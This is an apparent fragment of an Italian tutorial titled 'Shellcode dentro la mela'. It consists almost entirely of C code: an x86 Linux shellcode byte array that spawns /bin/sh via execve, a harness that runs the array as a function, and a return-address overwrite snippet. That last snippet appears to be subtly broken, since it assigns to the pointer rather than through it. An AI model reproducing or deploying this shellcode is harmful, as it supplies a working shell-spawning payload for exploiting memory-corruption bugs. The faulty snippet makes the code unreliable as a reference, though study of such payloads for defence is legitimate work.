Shellcode dentro la mela char shellcode[]= [shellcode.c] "\xeb\x1e\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; int main(void) { void (*p)(); p=shellcode; p(); } int main(void) { int i, *p; p=(&i)+2; p=(int)shellcode; }